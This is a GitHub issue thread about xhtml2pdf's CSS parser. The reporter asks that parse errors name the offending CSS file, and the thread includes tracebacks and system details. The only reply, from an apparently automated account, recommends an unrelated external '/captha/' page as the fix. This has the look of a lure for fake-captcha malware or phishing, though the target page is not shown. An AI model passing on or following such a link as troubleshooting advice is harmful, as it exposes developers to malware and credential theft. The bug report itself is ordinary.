### ISSUE TITLE
cssParser: which file is wrong?

### ISSUE THREAD

**Issue by Lonerider2010** [xhtml2pdf/xhtml2pdf#780]
### Describe the Bug

When I run xhtml2pdf for conversion, it throws a cssParser error. The error messages show exactly the code snippet, where the error occurs, but not in which file.

### Minimal Example to Reproduce

Here is the wrong part of the (unknown) css:
`('calc(var(--fa-li-width, 2em)', '*-1);position:absolu')`

Here the Python code:
`with open('input.html', 'r') as html_file:
...     html = html_file.read()

with open('output.pdf', 'wb') as pdf_file:
...     pisa_status = pisa.CreatePDF(html, dest=pdf_file)`

### Expected Behavior

If the cssParser detects an error, it should list the css file, where the error occurs, and then the code snippet which is wrong.

### Actual Behavior

The cssParser shows the code snippet which is wrong, but not the file, where this snippet belongs to.

### Additional Information

A log file:
'Error while parsing CSS file
Traceback (most recent call last):
  File "venv/lib/python3.11/site-packages/xhtml2pdf/context.py", line 519, in parseExternal
    result = self.parse(cssFile.getData())
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "venv/lib/python3.11/site-packages/xhtml2pdf/w3c/cssParser.py", line 458, in parse
    src, stylesheet = self._parseStylesheet(src)
                      ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "venv/lib/python3.11/site-packages/xhtml2pdf/w3c/cssParser.py", line 566, in _parseStylesheet
    src, ruleset = self._parseRuleset(src)
                   ^^^^^^^^^^^^^^^^^^^^^^^
  File "venv/lib/python3.11/site-packages/xhtml2pdf/w3c/cssParser.py", line 919, in _parseRuleset
    src, properties = self._parseDeclarationGroup(src.lstrip())
                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "venv/lib/python3.11/site-packages/xhtml2pdf/w3c/cssParser.py", line 1101, in _parseDeclarationGroup
    src, single_property = self._parseDeclaration(src)
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "venv/lib/python3.11/site-packages/xhtml2pdf/w3c/cssParser.py", line 1144, in _parseDeclaration
    src, single_property = self._parseDeclarationProperty(src, property_name)
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "venv/lib/python3.11/site-packages/xhtml2pdf/w3c/cssParser.py", line 1152, in _parseDeclarationProperty
    src, expr = self._parseExpression(src)
                ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "venv/lib/python3.11/site-packages/xhtml2pdf/w3c/cssParser.py", line 1169, in _parseExpression
    src, term = self._parseExpressionTerm(src)
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "venv/lib/python3.11/site-packages/xhtml2pdf/w3c/cssParser.py", line 1221, in _parseExpressionTerm
    raise self.ParseError(msg, src, ctxsrc)
xhtml2pdf.w3c.cssParser.CSSParseError: Terminal function expression expected closing ')':: ('calc(var(--fa-li-width, 2em)', '*-1);position:absolu')
Error while parsing CSS file
Traceback (most recent call last):
  File "venv/lib/python3.11/site-packages/xhtml2pdf/context.py", line 519, in parseExternal
    result = self.parse(cssFile.getData())
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "venv/lib/python3.11/site-packages/xhtml2pdf/w3c/cssParser.py", line 458, in parse
    src, stylesheet = self._parseStylesheet(src)
                      ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "venv/lib/python3.11/site-packages/xhtml2pdf/w3c/cssParser.py", line 542, in _parseStylesheet
    src = self.re_comment.sub("", src)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: expected string or bytes-like object, got 'NoneType'
'

<details>
  <summary>Traceback</summary>

  ```
  ```

</details>

### System Information

OS version: Debian GNU/Linux 12 (bookworm) aarch64 
Python version: 3.11.2
XHTML2PDF version: 0.2.16

**Comment by nonubot123** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.
